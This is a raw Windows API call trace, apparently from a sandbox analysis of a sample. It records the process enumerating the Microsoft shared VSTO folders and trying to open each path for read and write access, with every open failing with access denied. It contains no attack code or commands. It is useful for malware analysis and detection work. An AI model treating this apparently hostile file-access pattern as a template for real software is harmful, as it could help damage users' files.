ftCreationTime.dwHighDateTime=0x74, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6dfb0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x74, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓က\x0f⺊Ā")) returned 0 [0087.673] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0087.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0087.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0087.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0087.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0087.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.674] AreFileApisANSI () returned 1 [0087.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO", lpUsedDefaultChar=0x0) returned 52 [0087.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0087.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.674] AreFileApisANSI () returned 1 [0087.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0087.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0087.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 52 [0087.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.674] GetLastError () returned 0x5 [0087.674] GetLastError () returned 0x5 [0087.674] SetLastError (dwErrCode=0x5) [0087.674] GetLastError () returned 0x5 [0087.674] SetLastError (dwErrCode=0x5) [0087.674] GetLastError () returned 0x5 [0087.675] SetLastError (dwErrCode=0x5) [0087.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0087.675] AreFileApisANSI () returned 1 [0087.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0087.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0087.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 52 [0087.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.675] GetLastError () returned 0x5 [0087.675] GetLastError () returned 0x5 [0087.675] SetLastError (dwErrCode=0x5) [0087.675] GetLastError () returned 0x5 [0087.675] SetLastError (dwErrCode=0x5) [0087.675] GetLastError () returned 0x5 [0087.675] SetLastError (dwErrCode=0x5) [0087.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0087.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0087.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.675] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x66, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x76028, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x66, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0087.676] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.676] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78250 [0087.676] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.676] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4aebd53e, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0087.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0087.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0087.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0087.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0087.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0087.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.677] AreFileApisANSI () returned 1 [0087.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0", lpUsedDefaultChar=0x0) returned 57 [0087.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0087.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.677] AreFileApisANSI () returned 1 [0087.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0087.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0087.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 57 [0087.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.677] GetLastError () returned 0x5 [0087.677] GetLastError () returned 0x5 [0087.677] SetLastError (dwErrCode=0x5) [0087.677] GetLastError () returned 0x5 [0087.677] SetLastError (dwErrCode=0x5) [0087.677] GetLastError () returned 0x5 [0087.677] SetLastError (dwErrCode=0x5) [0087.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0087.678] AreFileApisANSI () returned 1 [0087.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0087.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0087.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 57 [0087.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.678] GetLastError () returned 0x5 [0087.678] GetLastError () returned 0x5 [0087.678] SetLastError (dwErrCode=0x5) [0087.678] GetLastError () returned 0x5 [0087.678] SetLastError (dwErrCode=0x5) [0087.678] GetLastError () returned 0x5 [0087.678] SetLastError (dwErrCode=0x5) [0087.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0087.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0087.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0087.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0087.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0087.678] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0087.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0087.679] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x784d0 [0087.681] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4aebd53e, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.681] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4a6fdac8, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0087.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.682] AreFileApisANSI () returned 1 [0087.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033", lpUsedDefaultChar=0x0) returned 62 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0087.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.682] AreFileApisANSI () returned 1 [0087.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0087.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e3e8 [0087.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 62 [0087.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, 